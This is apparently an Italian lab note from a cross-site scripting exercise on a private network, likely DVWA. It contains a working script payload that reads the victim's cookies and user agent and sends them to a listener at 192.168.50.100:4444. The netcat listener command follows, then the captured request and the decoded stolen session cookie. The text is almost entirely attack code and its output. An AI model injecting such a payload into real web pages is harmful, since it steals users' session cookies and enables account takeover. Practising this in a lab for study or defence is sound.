<Script>
	var i = new Image();
	var data = "cookie="+document.cookie + "&userAgent="+navigator.userAgent + "&date="+new Date().toISOString();
	i.src = "http://192.168.50.100:4444/?" + encodeURIComponent(data);
</Script>


Ascolto:

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.50.100] from (UNKNOWN) [192.168.50.100] 49380
GET /?cookie%3Dsecurity%3Dmedium%3B%20PHPSESSID%3D84d3974575fc6c312287e6d9082f1599%26userAgent%3DMozilla%2F5.0%20(X11%3B%20Linux%20x86_64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F127.0.0.0%20Safari%2F537.36%26date%3D2025-01-07T14%3A01%3A48.795Z HTTP/1.1
Host: 192.168.50.100:4444
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://192.168.50.150/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

Dati in chiaro:

cookie: security=medium PHPSESSID=84d3974575fc6c312287e6d9082f1599
userAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
date: 2025-01-07T14:01:48.795Z



